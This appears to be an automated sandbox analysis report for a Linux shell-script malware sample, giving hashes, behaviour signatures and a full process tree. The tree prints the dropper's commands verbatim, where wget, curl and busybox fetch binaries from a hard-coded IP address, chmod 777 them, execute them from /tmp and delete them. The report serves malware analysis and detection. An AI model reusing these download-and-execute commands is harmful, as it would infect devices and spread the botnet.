Analysis
-
max time kernel
135s -
max time network
138s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 852 chmod 888 chmod 900 chmod 752 chmod 942 chmod 954 chmod 732 chmod 810 chmod 972 chmod 918 chmod 960 chmod 966 chmod 778 chmod 827 chmod 870 chmod 906 chmod 912 chmod 738 chmod 858 chmod 930 chmod 936 chmod 801 chmod 864 chmod 876 chmod 882 chmod 894 chmod 924 chmod 948 chmod -
Executes dropped EXE 28 IoCs
Processes:
49irlYlhW1pQmwlDaVrLaKzYecToHyUObHqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwgZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt49irlYlhW1pQmwlDaVrLaKzYecToHyUObHlZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQioc pid Process /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 733 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 739 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 754 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 779 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 802 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 811 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 829 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 853 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 859 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 865 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 871 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 877 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 883 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 889 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 895 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 901 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 907 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 913 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 919 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 925 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 931 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 937 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 943 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 949 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 955 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 961 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 967 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 973 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztrmcurlwgetbusyboxxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztwgetcurlbusyboxpid Process 956 rm 889 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 890 rm 952 curl 951 wget 953 busybox 955 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 885 wget 886 curl 887 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:711
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:730
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:737
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:740
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:741
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:747
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:756
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:773
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:784
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:785
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:799
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:809
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:823
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:830
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:833
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:851
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:857
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:863
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:869
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:875
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:879
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:881
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:884
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:889
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:891
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:893
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:896
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:897
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:899
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:902
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:903
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:905
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:908
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:909
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:911
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:914
-
-
